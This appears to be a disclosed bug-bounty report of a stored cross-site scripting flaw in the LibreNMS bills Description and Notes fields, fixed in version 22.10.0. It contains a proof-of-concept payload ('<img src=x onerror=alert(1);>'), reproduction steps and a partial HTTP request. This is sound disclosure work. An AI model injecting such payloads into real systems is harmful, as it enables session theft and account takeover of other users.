librenms bills Description & Notes Stored XSS in librenms/librenms


Reported on

Apr 12th 2022


Please enter a description of the vulnerability.

Proof of Concept

  1. Login
  2. go to http://[librenms]/bills
  3. Click to Create Bill
  4. Add Description or Notes ["<img src=x onerror=alert(1);>"]
// PoC.js

payload_1 payload_2

POST /bills/ HTTP/1.1
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7



It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data

We are processing your report and will contact the librenms team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a exists 2 years ago
dnr6419 modified the report
2 years ago
We have contacted a member of the librenms team and are waiting to hear back 2 years ago
We have sent a follow up to the librenms team. We will try again in 4 days. 2 years ago
We have sent a second follow up to the librenms team. We will try again in 7 days. 2 years ago
We have sent a third follow up to the librenms team. We will try again in 14 days. 2 years ago
Tony Murray validated this vulnerability a year ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit 43cb72 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation